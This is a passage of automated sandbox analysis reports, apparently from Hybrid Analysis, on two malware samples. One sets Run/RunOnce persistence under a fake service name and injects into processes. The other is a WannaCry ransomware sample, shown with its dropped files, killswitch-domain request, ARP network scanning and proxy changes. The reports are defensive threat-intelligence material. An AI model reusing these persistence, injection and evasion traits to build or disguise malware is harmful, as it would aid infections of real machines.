\"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has a section named \".eh_fram\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-17", "relevance": 10, "name": "Found TLS callbacks", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has a TLS callback with entrypoint at 0x412320\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has a TLS callback with entrypoint at 0x4122d0\n \"085cda53603755dc.exe\" has a TLS callback with entrypoint at 0x412320\n \"085cda53603755dc.exe\" has a TLS callback with entrypoint at 0x4122d0", "origin": "Static Parser", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegCreateKeyExW\n RegDeleteValueW\n RegCloseKey\n OpenProcessToken\n RegOpenKeyExW\n CreateToolhelp32Snapshot\n Process32First\n LoadLibraryA\n GetModuleFileNameW\n VirtualProtect\n GetFileAttributesW\n GetModuleFileNameA\n Process32Next\n OpenProcess\n UnhandledExceptionFilter\n GetCommandLineW\n DeleteFileW\n GetProcAddress\n GetTempPathA\n LoadLibraryW\n FindNextFileW\n GetTempPathW\n GetStartupInfoA\n GetCommandLineA\n FindFirstFileW\n WriteFile\n TerminateProcess\n CreateFileW\n CreateProcessW\n Sleep\n GetTickCount\n GetFileSize\n GetModuleHandleA\n ShellExecuteW\n HttpSendRequestA\n InternetReadFile\n InternetCloseHandle\n InternetOpenA\n InternetConnectA\n HttpQueryInfoA\n WSAStartup", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" wrote 16264 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"ping.exe\" (Indicator: \"ping.exe\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"ping.exe\" (Indicator: \"ping.exe\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found string \"ping 0, Gen5\" (Indicator: \"ping\"; Source: \"00000000-00006104.00000000.173155.00650000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "string-417", "type": 2, "relevance": 1, "name": "Contains ability to identify remote systems", "description": "Found string \"ping 0, Gen5\" (Indicator: \"ping \"; Source: \"00000000-00006104.00000000.173155.00650000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0
https://hybrid-analysis.com/sample/cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0
Hybrid Analysis - Ransomware
{"size": 5267459, "type": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "submit_name": "a55b9addb2447db1882a3ae995a70151.vir", "sha256": "cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0", "av_detect": 96, "vx_family": "CVE-2017-0147", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "total_network_connections": 206, "total_processes": 3, "total_signatures": 43, "extracted_files": [{"name": "mssecsvc.exe", "file_path": "%WINDIR%\\mssecsvc.exe", "file_size": 3723264, "sha256": "a90873267deb6777193d65a390752e86b6a1bbf3523cfb28c266139e24ed69f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "rundll32.exe (PID: 2332)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Ransom.WannaCryptor", "av_matched": 77, "av_total": 87, "file_available_to_download": true}, {"name": "tasksche.exe", "file_path": "%WINDIR%\\tasksche.exe", "file_size": 3514368, "sha256": "f60f8a6bcaf1384a0d6a76d3e88007a8604560b263d2b8aeee06fd74c9ee5b3b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "mssecsvc.exe (PID: 2648)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Ransom.WannaCryptor", "av_matched": 78, "av_total": 87, "file_available_to_download": true}, {"name": "zqkdnfb@iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[1].txt", "file_path": "%APPDATA%\\Microsoft\\Windows\\Cookies\\zqkdnfb@iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[1].txt", "file_size": 146, "sha256": "4aa63fd32371a834a06c9f984268a95486287678aa20d5411e8e44ed7e9c904b", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "mssecsvc.exe (PID: 2648)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00014740-00002460", "name": "<Ignored Process>"}, {"uid": "00014966-00002332", "parentuid": "00014740-00002460", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\System32\\rundll32.exe", "command_line": "C:\\cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0.dll\",PlayGame", "sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "av_total": 62}, {"uid": "00015041-00002648", "parentuid": "00014966-00002332", "name": "mssecsvc.exe", "normalized_path": "%WINDIR%\\mssecsvc.exe", "sha256": "a90873267deb6777193d65a390752e86b6a1bbf3523cfb28c266139e24ed69f8", "av_label": "Trojan.Ransom.WannaCryptor", "av_matched": 77, "av_total": 87}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\"", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:62082\"\n \"<IPv4>:62096\"\n \"<IPv4>:62108\"\n \"<IPv4>:62110\"\n \"<IPv4>:62120\"\n \"<IPv4>:62123\"\n \"<IPv4>:62130\"\n \"<IPv4>:62133\"\n \"<IPv4>:62136\"\n \"<IPv4>:62146\"\n \"<IPv4>:62149\"\n \"<IPv4>:62153\"\n \"<IPv4>:62160\"\n \"<IPv4>:62161\"\n \"<IPv4>:62164\"\n \"<IPv4>:62169\"\n \"<IPv4>:62175\"\n \"<IPv4>:62176\"\n \"<IPv4>:62179\"", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET / HTTP/1.1\nHost: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\nCache-Control: no-cache\"", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundll32.exe\" with commandline \"C:\\cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0.dll\"\nPlayGame\" (UID: 00014966-00002332), Spawned process \"mssecsvc.exe\" (UID: 00015041-00002648)", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\_!MSFTHISTORY!_\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!zqkdnfb!appdata!roaming!microsoft!windows!cookies!\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!zqkdnfb!appdata!local!microsoft!windows!history!history.ie5!\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetStartupMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetConnectionMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetProxyRegistryMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZoneAttributeCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\!IETld!Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!zqkdnfb!appdata!roaming!microsoft!windows!ietldcache!\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!zqkdnfb!appdata!local!microsoft!windows!temporary internet files!content.ie5!\"\n \"Local\\WininetStartupMutex\"\n \"Local\\c:!users!zqkdnfb!appdata!roaming!microsoft!windows!ietldcache!\"\n \"Local\\ZoneAttributeCacheCounterMutex\"\n \"Local\\WininetProxyRegistryMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\c:!users!zqkdnfb!appdata!roaming!microsoft!windows!cookies!\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"cf5ddb5dedea0104a3fc464c822e6181a9dd9fa6e27e713c54af0eafb7c5faf0.dll.bin\" was detected as \"Microsoft visual C++ 6.0 DLL\"\n \"tasksche.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"mssecsvc.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Installation/Persistance", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"mssecsvc.exe\" touched file \"C:\\Windows\\Globalization\\Sorting\\SortDefault.nls\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\ZQkDnFB\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\ZQkDnFB\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\ZQkDnFB\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\System32\\en-US\\urlmon.dll.mui\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\System32\\en-US\\KernelBase.dll.mui\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\System32\\msxml3r.dll\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\System32\\rsaenh.dll\"\n \"mssecsvc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\zqkdnfb@iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[1].txt\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\tasksche.exe\"\n \"mssecsvc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"mssecsvc.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"mssecsvc.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistance", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"tasksche.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"\n \"mssecsvc.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"\n \"zqkdnfb@iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[1].txt\" has type \"ASCII text\"", "origin": "Binary File"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-77", "type": 6, "relevance": 10, "name": "Opened the service control manager", "description": "\"mssecsvc.exe\" called \"OpenSCManager\" requesting access rights \"SC_MANAGER_CONNECT\" (0x1)\n \"mssecsvc.exe\" called \"OpenSCManager\" requesting access rights \"SC_MANAGER_ALL_ACCESS\" (0xf003f)", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-76", "type": 6, "relevance": 10, "name": "Requested access to a system service", "description": "\"mssecsvc.exe\" called \"OpenService\" to access the \"rasman\" service\n \"mssecsvc.exe\" called \"OpenService\" to access the \"Sens\" service requesting \"SERVICE_QUERY_STATUS\" (0X4) access rights\n \"mssecsvc.exe\" called \"OpenService\" to access the \"RASMAN\" service", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "hooks-8", "type": 11, "relevance": 10, "name": "Installs hooks/patches the running process", "description": "\"rundll32.exe\" wrote bytes \"7cca3c7700143d77e8ce3c777f3e3c7729fd3b774d983c775ba03c7782203877000000009498ab7651c1ab76ee9cab76ec32b57654d3ac7600000000\" to virtual address \"0x10002000\" (part of module \"CF5DDB5DEDEA0104A3FC464C822E6181A9DD9FA6E27E713C54AF0EAFB7C5FAF0.DLL\")", "origin": "Hook Detection"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistance", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"rundll32.exe\" is creating a new process (Name: \"%WINDIR%\\mssecsvc.exe\", Handle: 200)\n \"mssecsvc.exe\" is creating a new process (Name: \"%WINDIR%\\tasksche.exe\", Handle: 956)", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistance", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"tasksche.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"\n \"mssecsvc.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"", "origin": "Binary File"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-29", "type": 3, "relevance": 3, "name": "Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)", "description": "\"mssecsvc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"DISABLECACHINGOFSSLPAGES\"; Value: \"00000000040000000400000000000000\")", "origin": "Registry Access"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 10, "name": "Reads the cryptographic machine GUID", "description": "\"mssecsvc.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-32", "type": 7, "relevance": 10, "name": "Detected increased number of ARP broadcast requests (network device lookup)", "description": "Attempt to find devices in networks: \"<IPv4>/31, <IPv4>/30, <IPv4>/29, <IPv4>/30, ...\"", "origin": "Network Traffic"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-36", "type": 3, "relevance": 8, "name": "Queries sensitive IE security settings", "description": "\"mssecsvc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\SECURITY\"; Key: \"DISABLESECURITYSETTINGSCHECK\")", "origin": "Registry Access"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"mssecsvc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"mssecsvc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"mssecsvc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"mssecsvc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"mssecsvc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "registry-61", "type": 3, "relevance": 10, "name": "Reads terminal service related keys (often RDP related)", "description": "\"mssecsvc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\")", "origin": "Registry Access"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "78/87 Antivirus vendors marked dropped file \"tasksche.exe\" as malicious (classified as \"Trojan.Ransom.WannaCryptor\" with 89% detection rate)\n 77/87 Antivirus vendors marked dropped file \"mssecsvc.exe\" as malicious (classified as \"Trojan.Ransom.WannaCryptor\" with 88% detection rate)", "origin": "Binary File"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "77/87 Antivirus vendors marked spawned process \"mssecsvc.exe\" (PID: 2648) as malicious (classified as \"Trojan.Ransom.WannaCryptor\" with 88% detection rate)", "origin": "Monitored Target"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistance", "identifier": "api-5", "type": 6, "relevance": 7, "name": "Creates a system file in windows directory", "description": "\"rundll32.exe\" created file \"%WINDIR%\\mssecsvc.exe\"\n \"mssecsvc.exe\" created file \"%WINDIR%\\tasksche.exe\"", "origin": "API Call"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistance", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%WINDIR%\\tasksche.exe\"\n File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%WINDIR%\\mssecsvc.exe\"", "origin": "Binary File"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-31", "type": 7, "relevance": 10, "name": "Detected a large number of ARP broadcast requests (network device lookup)", "description": "Attempt to find devices in networks: \"<IPv4>/31, <IPv4>/30, <IPv4>/29, <IPv4>/30, <IPv4>/32, <IPv4>/31, <IPv4>/29, <IPv4>/27, <IPv4>/26, <IPv4>/26, <IPv4>/27, 